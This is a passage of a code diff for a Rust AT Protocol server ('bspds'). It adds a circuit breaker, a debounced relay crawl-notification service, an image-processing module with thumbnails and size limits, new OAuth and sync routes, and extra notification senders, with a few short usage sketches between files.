CircuitState::Open => {
43
+
let last_failure = self.last_failure_time.load(Ordering::SeqCst);
44
+
let now = std::time::SystemTime::now()
45
+
.duration_since(std::time::UNIX_EPOCH)
46
+
.unwrap()
47
+
.as_secs();
48
+
49
+
if now - last_failure >= self.timeout.as_secs() {
50
+
drop(state);
51
+
let mut state = self.state.write().await;
52
+
if *state == CircuitState::Open {
53
+
*state = CircuitState::HalfOpen;
54
+
self.success_count.store(0, Ordering::SeqCst);
55
+
tracing::info!(circuit = %self.name, "Circuit breaker transitioning to half-open");
56
+
return true;
57
+
}
58
+
}
59
+
false
60
+
}
61
+
CircuitState::HalfOpen => true,
62
+
}
63
+
}
64
+
65
+
pub async fn record_success(&self) {
66
+
let state = *self.state.read().await;
67
+
68
+
match state {
69
+
CircuitState::Closed => {
70
+
self.failure_count.store(0, Ordering::SeqCst);
71
+
}
72
+
CircuitState::HalfOpen => {
73
+
let count = self.success_count.fetch_add(1, Ordering::SeqCst) + 1;
74
+
if count >= self.success_threshold {
75
+
let mut state = self.state.write().await;
76
+
*state = CircuitState::Closed;
77
+
self.failure_count.store(0, Ordering::SeqCst);
78
+
self.success_count.store(0, Ordering::SeqCst);
79
+
tracing::info!(circuit = %self.name, "Circuit breaker closed after successful recovery");
80
+
}
81
+
}
82
+
CircuitState::Open => {}
83
+
}
84
+
}
85
+
86
+
pub async fn record_failure(&self) {
87
+
let state = *self.state.read().await;
88
+
89
+
match state {
90
+
CircuitState::Closed => {
91
+
let count = self.failure_count.fetch_add(1, Ordering::SeqCst) + 1;
92
+
if count >= self.failure_threshold {
93
+
let mut state = self.state.write().await;
94
+
*state = CircuitState::Open;
95
+
let now = std::time::SystemTime::now()
96
+
.duration_since(std::time::UNIX_EPOCH)
97
+
.unwrap()
98
+
.as_secs();
99
+
self.last_failure_time.store(now, Ordering::SeqCst);
100
+
tracing::warn!(
101
+
circuit = %self.name,
102
+
failures = count,
103
+
"Circuit breaker opened after {} failures",
104
+
count
105
+
);
106
+
}
107
+
}
108
+
CircuitState::HalfOpen => {
109
+
let mut state = self.state.write().await;
110
+
*state = CircuitState::Open;
111
+
let now = std::time::SystemTime::now()
112
+
.duration_since(std::time::UNIX_EPOCH)
113
+
.unwrap()
114
+
.as_secs();
115
+
self.last_failure_time.store(now, Ordering::SeqCst);
116
+
self.success_count.store(0, Ordering::SeqCst);
117
+
tracing::warn!(circuit = %self.name, "Circuit breaker reopened after failure in half-open state");
118
+
}
119
+
CircuitState::Open => {}
120
+
}
121
+
}
122
+
123
+
pub async fn state(&self) -> CircuitState {
124
+
*self.state.read().await
125
+
}
126
+
127
+
pub fn name(&self) -> &str {
128
+
&self.name
129
+
}
130
+
}
131
+
132
+
#[derive(Clone)]
133
+
pub struct CircuitBreakers {
134
+
pub plc_directory: Arc<CircuitBreaker>,
135
+
pub relay_notification: Arc<CircuitBreaker>,
136
+
}
137
+
138
+
impl Default for CircuitBreakers {
139
+
fn default() -> Self {
140
+
Self::new()
141
+
}
142
+
}
143
+
144
+
impl CircuitBreakers {
145
+
pub fn new() -> Self {
146
+
Self {
147
+
plc_directory: Arc::new(CircuitBreaker::new("plc_directory", 5, 3, 60)),
148
+
relay_notification: Arc::new(CircuitBreaker::new("relay_notification", 10, 5, 30)),
149
+
}
150
+
}
151
+
}
152
+
153
+
#[derive(Debug)]
154
+
pub struct CircuitOpenError {
155
+
pub circuit_name: String,
156
+
}
157
+
158
+
impl std::fmt::Display for CircuitOpenError {
159
+
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
160
+
write!(f, "Circuit breaker '{}' is open", self.circuit_name)
161
+
}
162
+
}
163
+
164
+
impl std::error::Error for CircuitOpenError {}
165
+
166
+
pub async fn with_circuit_breaker<T, E, F, Fut>(
167
+
circuit: &CircuitBreaker,
168
+
operation: F,
169
+
) -> Result<T, CircuitBreakerError<E>>
170
+
where
171
+
F: FnOnce() -> Fut,
172
+
Fut: std::future::Future<Output = Result<T, E>>,
173
+
{
174
+
if !circuit.can_execute().await {
175
+
return Err(CircuitBreakerError::CircuitOpen(CircuitOpenError {
176
+
circuit_name: circuit.name().to_string(),
177
+
}));
178
+
}
179
+
180
+
match operation().await {
181
+
Ok(result) => {
182
+
circuit.record_success().await;
183
+
Ok(result)
184
+
}
185
+
Err(e) => {
186
+
circuit.record_failure().await;
187
+
Err(CircuitBreakerError::OperationFailed(e))
188
+
}
189
+
}
190
+
}
191
+
192
+
#[derive(Debug)]
193
+
pub enum CircuitBreakerError<E> {
194
+
CircuitOpen(CircuitOpenError),
195
+
OperationFailed(E),
196
+
}
197
+
198
+
impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
199
+
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
200
+
match self {
201
+
CircuitBreakerError::CircuitOpen(e) => write!(f, "{}", e),
202
+
CircuitBreakerError::OperationFailed(e) => write!(f, "Operation failed: {}", e),
203
+
}
204
+
}
205
+
}
206
+
207
+
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
208
+
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
209
+
match self {
210
+
CircuitBreakerError::CircuitOpen(e) => Some(e),
211
+
CircuitBreakerError::OperationFailed(e) => Some(e),
212
+
}
213
+
}
214
+
}
215
+
216
+
#[cfg(test)]
217
+
mod tests {
218
+
use super::*;
219
+
220
+
#[tokio::test]
221
+
async fn test_circuit_breaker_starts_closed() {
222
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
223
+
assert_eq!(cb.state().await, CircuitState::Closed);
224
+
assert!(cb.can_execute().await);
225
+
}
226
+
227
+
#[tokio::test]
228
+
async fn test_circuit_breaker_opens_after_failures() {
229
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
230
+
231
+
cb.record_failure().await;
232
+
assert_eq!(cb.state().await, CircuitState::Closed);
233
+
234
+
cb.record_failure().await;
235
+
assert_eq!(cb.state().await, CircuitState::Closed);
236
+
237
+
cb.record_failure().await;
238
+
assert_eq!(cb.state().await, CircuitState::Open);
239
+
assert!(!cb.can_execute().await);
240
+
}
241
+
242
+
#[tokio::test]
243
+
async fn test_circuit_breaker_success_resets_failures() {
244
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
245
+
246
+
cb.record_failure().await;
247
+
cb.record_failure().await;
248
+
cb.record_success().await;
249
+
250
+
cb.record_failure().await;
251
+
cb.record_failure().await;
252
+
assert_eq!(cb.state().await, CircuitState::Closed);
253
+
254
+
cb.record_failure().await;
255
+
assert_eq!(cb.state().await, CircuitState::Open);
256
+
}
257
+
258
+
#[tokio::test]
259
+
async fn test_circuit_breaker_half_open_closes_after_successes() {
260
+
let cb = CircuitBreaker::new("test", 3, 2, 0);
261
+
262
+
for _ in 0..3 {
263
+
cb.record_failure().await;
264
+
}
265
+
assert_eq!(cb.state().await, CircuitState::Open);
266
+
267
+
tokio::time::sleep(Duration::from_millis(100)).await;
268
+
269
+
assert!(cb.can_execute().await);
270
+
assert_eq!(cb.state().await, CircuitState::HalfOpen);
271
+
272
+
cb.record_success().await;
273
+
assert_eq!(cb.state().await, CircuitState::HalfOpen);
274
+
275
+
cb.record_success().await;
276
+
assert_eq!(cb.state().await, CircuitState::Closed);
277
+
}
278
+
279
+
#[tokio::test]
280
+
async fn test_circuit_breaker_half_open_reopens_on_failure() {
281
+
let cb = CircuitBreaker::new("test", 3, 2, 0);
282
+
283
+
for _ in 0..3 {
284
+
cb.record_failure().await;
285
+
}
286
+
287
+
tokio::time::sleep(Duration::from_millis(100)).await;
288
+
cb.can_execute().await;
289
+
290
+
cb.record_failure().await;
291
+
assert_eq!(cb.state().await, CircuitState::Open);
292
+
}
293
+
294
+
#[tokio::test]
295
+
async fn test_with_circuit_breaker_helper() {
296
+
let cb = CircuitBreaker::new("test", 3, 2, 10);
297
+
298
+
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
299
+
with_circuit_breaker(&cb, || async { Ok(42) }).await;
300
+
assert!(result.is_ok());
301
+
assert_eq!(result.unwrap(), 42);
302
+
303
+
let result: Result<i32, CircuitBreakerError<&str>> =
304
+
with_circuit_breaker(&cb, || async { Err("error") }).await;
305
+
assert!(result.is_err());
306
+
}
307
+
}
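Beyond the PLC handlers shown earlier, with_circuit_breaker wraps any fallible async call. A minimal sketch guarding a plain HTTP fetch; the breaker name, thresholds, and reqwest call are placeholders.

use crate::circuit_breaker::{with_circuit_breaker, CircuitBreaker, CircuitBreakerError};

// Sketch: guard an arbitrary HTTP call with a dedicated breaker.
async fn fetch_with_breaker(url: &str) -> Result<String, CircuitBreakerError<reqwest::Error>> {
    // In practice the breaker lives in shared state (see CircuitBreakers above);
    // it is constructed inline here only to keep the sketch self-contained.
    let breaker = CircuitBreaker::new("example_upstream", 5, 3, 60);
    with_circuit_breaker(&breaker, || async {
        reqwest::get(url).await?.text().await
    })
    .await
}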
+170
src/crawlers.rs
···
···
1
+
use crate::circuit_breaker::CircuitBreaker;
2
+
use crate::sync::firehose::SequencedEvent;
3
+
use reqwest::Client;
4
+
use std::sync::atomic::{AtomicU64, Ordering};
5
+
use std::sync::Arc;
6
+
use std::time::Duration;
7
+
use tokio::sync::{broadcast, watch};
8
+
use tracing::{debug, error, info, warn};
9
+
10
+
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
11
+
12
+
pub struct Crawlers {
13
+
hostname: String,
14
+
crawler_urls: Vec<String>,
15
+
http_client: Client,
16
+
last_notified: AtomicU64,
17
+
circuit_breaker: Option<Arc<CircuitBreaker>>,
18
+
}
19
+
20
+
impl Crawlers {
21
+
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
22
+
Self {
23
+
hostname,
24
+
crawler_urls,
25
+
http_client: Client::builder()
26
+
.timeout(Duration::from_secs(30))
27
+
.build()
28
+
.unwrap_or_default(),
29
+
last_notified: AtomicU64::new(0),
30
+
circuit_breaker: None,
31
+
}
32
+
}
33
+
34
+
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
35
+
self.circuit_breaker = Some(circuit_breaker);
36
+
self
37
+
}
38
+
39
+
pub fn from_env() -> Option<Self> {
40
+
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
41
+
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
42
+
.unwrap_or_default()
43
+
.split(',')
44
+
.filter(|s| !s.is_empty())
45
+
.map(|s| s.trim().to_string())
46
+
.collect();
47
+
48
+
if crawler_urls.is_empty() {
49
+
return None;
50
+
}
51
+
52
+
Some(Self::new(hostname, crawler_urls))
53
+
}
54
+
55
+
fn should_notify(&self) -> bool {
56
+
let now = std::time::SystemTime::now()
57
+
.duration_since(std::time::UNIX_EPOCH)
58
+
.unwrap_or_default()
59
+
.as_secs();
60
+
let last = self.last_notified.load(Ordering::Relaxed);
61
+
now - last >= NOTIFY_THRESHOLD_SECS
62
+
}
63
+
64
+
fn mark_notified(&self) {
65
+
let now = std::time::SystemTime::now()
66
+
.duration_since(std::time::UNIX_EPOCH)
67
+
.unwrap_or_default()
68
+
.as_secs();
69
+
self.last_notified.store(now, Ordering::Relaxed);
70
+
}
71
+
72
+
pub async fn notify_of_update(&self) {
73
+
if !self.should_notify() {
74
+
debug!("Skipping crawler notification due to debounce");
75
+
return;
76
+
}
77
+
78
+
if let Some(cb) = &self.circuit_breaker {
79
+
if !cb.can_execute().await {
80
+
debug!("Skipping crawler notification due to circuit breaker open");
81
+
return;
82
+
}
83
+
}
84
+
85
+
self.mark_notified();
86
+
87
+
let circuit_breaker = self.circuit_breaker.clone();
88
+
89
+
for crawler_url in &self.crawler_urls {
90
+
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
91
+
let hostname = self.hostname.clone();
92
+
let client = self.http_client.clone();
93
+
let cb = circuit_breaker.clone();
94
+
95
+
tokio::spawn(async move {
96
+
match client
97
+
.post(&url)
98
+
.json(&serde_json::json!({ "hostname": hostname }))
99
+
.send()
100
+
.await
101
+
{
102
+
Ok(response) => {
103
+
if response.status().is_success() {
104
+
debug!(crawler = %url, "Successfully notified crawler");
105
+
if let Some(cb) = cb {
106
+
cb.record_success().await;
107
+
}
108
+
} else {
109
+
warn!(
110
+
crawler = %url,
111
+
status = %response.status(),
112
+
"Crawler notification returned non-success status"
113
+
);
114
+
if let Some(cb) = cb {
115
+
cb.record_failure().await;
116
+
}
117
+
}
118
+
}
119
+
Err(e) => {
120
+
warn!(crawler = %url, error = %e, "Failed to notify crawler");
121
+
if let Some(cb) = cb {
122
+
cb.record_failure().await;
123
+
}
124
+
}
125
+
}
126
+
});
127
+
}
128
+
}
129
+
}
130
+
131
+
pub async fn start_crawlers_service(
132
+
crawlers: Arc<Crawlers>,
133
+
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
134
+
mut shutdown: watch::Receiver<bool>,
135
+
) {
136
+
info!(
137
+
hostname = %crawlers.hostname,
138
+
crawler_count = crawlers.crawler_urls.len(),
139
+
crawlers = ?crawlers.crawler_urls,
140
+
"Starting crawlers notification service"
141
+
);
142
+
143
+
loop {
144
+
tokio::select! {
145
+
result = firehose_rx.recv() => {
146
+
match result {
147
+
Ok(event) => {
148
+
if event.event_type == "commit" {
149
+
crawlers.notify_of_update().await;
150
+
}
151
+
}
152
+
Err(broadcast::error::RecvError::Lagged(n)) => {
153
+
warn!(skipped = n, "Crawlers service lagged behind firehose");
154
+
crawlers.notify_of_update().await;
155
+
}
156
+
Err(broadcast::error::RecvError::Closed) => {
157
+
error!("Firehose channel closed, stopping crawlers service");
158
+
break;
159
+
}
160
+
}
161
+
}
162
+
_ = shutdown.changed() => {
163
+
if *shutdown.borrow() {
164
+
info!("Crawlers service shutting down");
165
+
break;
166
+
}
167
+
}
168
+
}
169
+
}
170
+
}
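Outside from_env, the service can also be constructed directly, which is convenient in tests; the hostname and relay URL below are placeholders.

use crate::crawlers::Crawlers;

// Sketch: build a Crawlers instance by hand and fire one notification. This
// posts {"hostname": "pds.example.com"} to the relay's
// /xrpc/com.atproto.sync.requestCrawl endpoint, debounced to at most once
// per NOTIFY_THRESHOLD_SECS (20 minutes).
async fn notify_once() {
    let crawlers = Crawlers::new(
        "pds.example.com".to_string(),
        vec!["https://bsky.network".to_string()],
    );
    crawlers.notify_of_update().await;
}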
+304
src/image/mod.rs
···
···
1
+
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
+
use std::io::Cursor;
3
+
4
+
pub const THUMB_SIZE_FEED: u32 = 200;
5
+
pub const THUMB_SIZE_FULL: u32 = 1000;
6
+
7
+
#[derive(Debug, Clone)]
8
+
pub struct ProcessedImage {
9
+
pub data: Vec<u8>,
10
+
pub mime_type: String,
11
+
pub width: u32,
12
+
pub height: u32,
13
+
}
14
+
15
+
#[derive(Debug, Clone)]
16
+
pub struct ImageProcessingResult {
17
+
pub original: ProcessedImage,
18
+
pub thumbnail_feed: Option<ProcessedImage>,
19
+
pub thumbnail_full: Option<ProcessedImage>,
20
+
}
21
+
22
+
#[derive(Debug, thiserror::Error)]
23
+
pub enum ImageError {
24
+
#[error("Failed to decode image: {0}")]
25
+
DecodeError(String),
26
+
27
+
#[error("Failed to encode image: {0}")]
28
+
EncodeError(String),
29
+
30
+
#[error("Unsupported image format: {0}")]
31
+
UnsupportedFormat(String),
32
+
33
+
#[error("Image too large: {width}x{height} exceeds maximum {max_dimension}")]
34
+
TooLarge {
35
+
width: u32,
36
+
height: u32,
37
+
max_dimension: u32,
38
+
},
39
+
40
+
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
41
+
FileTooLarge { size: usize, max_size: usize },
42
+
}
43
+
44
+
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
45
+
46
+
pub struct ImageProcessor {
47
+
max_dimension: u32,
48
+
max_file_size: usize,
49
+
output_format: OutputFormat,
50
+
generate_thumbnails: bool,
51
+
}
52
+
53
+
#[derive(Debug, Clone, Copy)]
54
+
pub enum OutputFormat {
55
+
WebP,
56
+
Jpeg,
57
+
Png,
58
+
Original,
59
+
}
60
+
61
+
impl Default for ImageProcessor {
62
+
fn default() -> Self {
63
+
Self {
64
+
max_dimension: 4096,
65
+
max_file_size: DEFAULT_MAX_FILE_SIZE,
66
+
output_format: OutputFormat::WebP,
67
+
generate_thumbnails: true,
68
+
}
69
+
}
70
+
}
71
+
72
+
impl ImageProcessor {
73
+
pub fn new() -> Self {
74
+
Self::default()
75
+
}
76
+
77
+
pub fn with_max_dimension(mut self, max: u32) -> Self {
78
+
self.max_dimension = max;
79
+
self
80
+
}
81
+
82
+
pub fn with_max_file_size(mut self, max: usize) -> Self {
83
+
self.max_file_size = max;
84
+
self
85
+
}
86
+
87
+
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
88
+
self.output_format = format;
89
+
self
90
+
}
91
+
92
+
pub fn with_thumbnails(mut self, generate: bool) -> Self {
93
+
self.generate_thumbnails = generate;
94
+
self
95
+
}
96
+
97
+
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
98
+
if data.len() > self.max_file_size {
99
+
return Err(ImageError::FileTooLarge {
100
+
size: data.len(),
101
+
max_size: self.max_file_size,
102
+
});
103
+
}
104
+
105
+
let format = self.detect_format(mime_type, data)?;
106
+
let img = self.decode_image(data, format)?;
107
+
108
+
if img.width() > self.max_dimension || img.height() > self.max_dimension {
109
+
return Err(ImageError::TooLarge {
110
+
width: img.width(),
111
+
height: img.height(),
112
+
max_dimension: self.max_dimension,
113
+
});
114
+
}
115
+
116
+
let original = self.encode_image(&img)?;
117
+
118
+
let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) {
119
+
Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?)
120
+
} else {
121
+
None
122
+
};
123
+
124
+
let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) {
125
+
Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?)
126
+
} else {
127
+
None
128
+
};
129
+
130
+
Ok(ImageProcessingResult {
131
+
original,
132
+
thumbnail_feed,
133
+
thumbnail_full,
134
+
})
135
+
}
136
+
137
+
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
138
+
match mime_type.to_lowercase().as_str() {
139
+
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
140
+
"image/png" => Ok(ImageFormat::Png),
141
+
"image/gif" => Ok(ImageFormat::Gif),
142
+
"image/webp" => Ok(ImageFormat::WebP),
143
+
_ => {
144
+
if let Ok(format) = image::guess_format(data) {
145
+
Ok(format)
146
+
} else {
147
+
Err(ImageError::UnsupportedFormat(mime_type.to_string()))
148
+
}
149
+
}
150
+
}
151
+
}
152
+
153
+
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
154
+
let cursor = Cursor::new(data);
155
+
let reader = ImageReader::with_format(cursor, format);
156
+
reader
157
+
.decode()
158
+
.map_err(|e| ImageError::DecodeError(e.to_string()))
159
+
}
160
+
161
+
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
162
+
let (data, mime_type) = match self.output_format {
163
+
OutputFormat::WebP => {
164
+
let mut buf = Vec::new();
165
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
166
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
167
+
(buf, "image/webp".to_string())
168
+
}
169
+
OutputFormat::Jpeg => {
170
+
let mut buf = Vec::new();
171
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
172
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
173
+
(buf, "image/jpeg".to_string())
174
+
}
175
+
OutputFormat::Png => {
176
+
let mut buf = Vec::new();
177
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
178
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
179
+
(buf, "image/png".to_string())
180
+
}
181
+
OutputFormat::Original => {
182
+
let mut buf = Vec::new();
183
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
184
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
185
+
(buf, "image/png".to_string())
186
+
}
187
+
};
188
+
189
+
Ok(ProcessedImage {
190
+
data,
191
+
mime_type,
192
+
width: img.width(),
193
+
height: img.height(),
194
+
})
195
+
}
196
+
197
+
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
198
+
let (orig_width, orig_height) = (img.width(), img.height());
199
+
200
+
let (new_width, new_height) = if orig_width > orig_height {
201
+
let ratio = max_size as f64 / orig_width as f64;
202
+
(max_size, (orig_height as f64 * ratio) as u32)
203
+
} else {
204
+
let ratio = max_size as f64 / orig_height as f64;
205
+
((orig_width as f64 * ratio) as u32, max_size)
206
+
};
207
+
208
+
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
209
+
self.encode_image(&thumb)
210
+
}
211
+
212
+
pub fn is_supported_mime_type(mime_type: &str) -> bool {
213
+
matches!(
214
+
mime_type.to_lowercase().as_str(),
215
+
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
216
+
)
217
+
}
218
+
219
+
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
220
+
let format = image::guess_format(data)
221
+
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
222
+
223
+
let cursor = Cursor::new(data);
224
+
let img = ImageReader::with_format(cursor, format)
225
+
.decode()
226
+
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
227
+
228
+
let mut buf = Vec::new();
229
+
img.write_to(&mut Cursor::new(&mut buf), format)
230
+
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
231
+
232
+
Ok(buf)
233
+
}
234
+
}
235
+
236
+
#[cfg(test)]
237
+
mod tests {
238
+
use super::*;
239
+
240
+
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
241
+
let img = DynamicImage::new_rgb8(width, height);
242
+
let mut buf = Vec::new();
243
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
244
+
buf
245
+
}
246
+
247
+
#[test]
248
+
fn test_process_small_image() {
249
+
let processor = ImageProcessor::new();
250
+
let data = create_test_image(100, 100);
251
+
252
+
let result = processor.process(&data, "image/png").unwrap();
253
+
254
+
assert!(result.thumbnail_feed.is_none());
255
+
assert!(result.thumbnail_full.is_none());
256
+
}
257
+
258
+
#[test]
259
+
fn test_process_large_image_generates_thumbnails() {
260
+
let processor = ImageProcessor::new();
261
+
let data = create_test_image(2000, 1500);
262
+
263
+
let result = processor.process(&data, "image/png").unwrap();
264
+
265
+
assert!(result.thumbnail_feed.is_some());
266
+
assert!(result.thumbnail_full.is_some());
267
+
268
+
let feed_thumb = result.thumbnail_feed.unwrap();
269
+
assert!(feed_thumb.width <= THUMB_SIZE_FEED);
270
+
assert!(feed_thumb.height <= THUMB_SIZE_FEED);
271
+
272
+
let full_thumb = result.thumbnail_full.unwrap();
273
+
assert!(full_thumb.width <= THUMB_SIZE_FULL);
274
+
assert!(full_thumb.height <= THUMB_SIZE_FULL);
275
+
}
276
+
277
+
#[test]
278
+
fn test_webp_conversion() {
279
+
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
280
+
let data = create_test_image(500, 500);
281
+
282
+
let result = processor.process(&data, "image/png").unwrap();
283
+
assert_eq!(result.original.mime_type, "image/webp");
284
+
}
285
+
286
+
#[test]
287
+
fn test_reject_too_large() {
288
+
let processor = ImageProcessor::new().with_max_dimension(1000);
289
+
let data = create_test_image(2000, 2000);
290
+
291
+
let result = processor.process(&data, "image/png");
292
+
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
293
+
}
294
+
295
+
#[test]
296
+
fn test_is_supported_mime_type() {
297
+
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
298
+
assert!(ImageProcessor::is_supported_mime_type("image/png"));
299
+
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
300
+
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
301
+
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
302
+
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
303
+
}
304
+
}
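A minimal sketch of driving the builder from blob-upload code; the 2048px cap and the incoming MIME type are placeholders, not values from this diff.

use crate::image::{ImageError, ImageProcessingResult, ImageProcessor, OutputFormat};

// Sketch: re-encode an uploaded JPEG as WebP with a 2048px dimension cap.
// result.thumbnail_feed / result.thumbnail_full come back as Some(..) only
// when the source exceeds THUMB_SIZE_FEED / THUMB_SIZE_FULL respectively.
fn process_upload(bytes: &[u8]) -> Result<ImageProcessingResult, ImageError> {
    let processor = ImageProcessor::new()
        .with_max_dimension(2048)
        .with_output_format(OutputFormat::WebP);
    processor.process(bytes, "image/jpeg")
}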
+22
src/lib.rs
···
1
pub mod api;
2
pub mod auth;
3
pub mod config;
4
pub mod notifications;
5
pub mod oauth;
6
pub mod plc;
7
pub mod repo;
8
pub mod state;
9
pub mod storage;
10
pub mod sync;
11
pub mod util;
12
13
use axum::{
14
Router,
···
20
Router::new()
21
.route("/health", get(api::server::health))
22
.route("/xrpc/_health", get(api::server::health))
23
.route(
24
"/xrpc/com.atproto.server.describeServer",
25
get(api::server::describe_server),
···
139
.route(
140
"/xrpc/com.atproto.sync.subscribeRepos",
141
get(sync::subscribe_repos),
142
)
143
.route(
144
"/xrpc/com.atproto.moderation.createReport",
···
338
)
339
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
340
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
341
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
342
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
343
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
344
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
345
.with_state(state)
346
}
···
1
pub mod api;
2
pub mod auth;
3
+
pub mod circuit_breaker;
4
pub mod config;
5
+
pub mod crawlers;
6
+
pub mod image;
7
pub mod notifications;
8
pub mod oauth;
9
pub mod plc;
10
+
pub mod rate_limit;
11
pub mod repo;
12
pub mod state;
13
pub mod storage;
14
pub mod sync;
15
pub mod util;
16
+
pub mod validation;
17
18
use axum::{
19
Router,
···
25
Router::new()
26
.route("/health", get(api::server::health))
27
.route("/xrpc/_health", get(api::server::health))
28
+
.route("/robots.txt", get(api::server::robots_txt))
29
.route(
30
"/xrpc/com.atproto.server.describeServer",
31
get(api::server::describe_server),
···
145
.route(
146
"/xrpc/com.atproto.sync.subscribeRepos",
147
get(sync::subscribe_repos),
148
+
)
149
+
.route(
150
+
"/xrpc/com.atproto.sync.getHead",
151
+
get(sync::get_head),
152
+
)
153
+
.route(
154
+
"/xrpc/com.atproto.sync.getCheckout",
155
+
get(sync::get_checkout),
156
)
157
.route(
158
"/xrpc/com.atproto.moderation.createReport",
···
352
)
353
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
354
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
355
+
.route("/oauth/authorize/select", post(oauth::endpoints::authorize_select))
356
+
.route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get))
357
+
.route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post))
358
+
.route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny))
359
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
360
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
361
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
362
+
.route(
363
+
"/xrpc/com.atproto.temp.checkSignupQueue",
364
+
get(api::temp::check_signup_queue),
365
+
)
366
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
367
.with_state(state)
368
}
+34
-9
src/main.rs
···
1
-
use bspds::notifications::{EmailSender, NotificationService};
2
use bspds::state::AppState;
3
use std::net::SocketAddr;
4
use std::process::ExitCode;
5
use tokio::sync::watch;
6
use tracing::{error, info, warn};
7
···
41
let state = AppState::new(pool.clone()).await;
42
43
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
44
-
let relays = std::env::var("RELAYS")
45
-
.unwrap_or_default()
46
-
.split(',')
47
-
.filter(|s| !s.is_empty())
48
-
.map(|s| s.to_string())
49
-
.collect();
50
-
bspds::sync::relay_client::start_relay_clients(state.clone(), relays, None).await;
51
52
let (shutdown_tx, shutdown_rx) = watch::channel(false);
53
···
60
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
61
}
62
63
-
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx));
64
65
let app = bspds::app(state);
66
···
75
.await;
76
77
notification_handle.await.ok();
78
79
if let Err(e) = server_result {
80
return Err(format!("Server error: {}", e).into());
···
1
+
use bspds::crawlers::{Crawlers, start_crawlers_service};
2
+
use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender};
3
use bspds::state::AppState;
4
use std::net::SocketAddr;
5
use std::process::ExitCode;
6
+
use std::sync::Arc;
7
use tokio::sync::watch;
8
use tracing::{error, info, warn};
9
···
43
let state = AppState::new(pool.clone()).await;
44
45
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
46
47
let (shutdown_tx, shutdown_rx) = watch::channel(false);
48
···
55
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
56
}
57
58
+
if let Some(discord_sender) = DiscordSender::from_env() {
59
+
info!("Discord notifications enabled");
60
+
notification_service = notification_service.register_sender(discord_sender);
61
+
}
62
+
63
+
if let Some(telegram_sender) = TelegramSender::from_env() {
64
+
info!("Telegram notifications enabled");
65
+
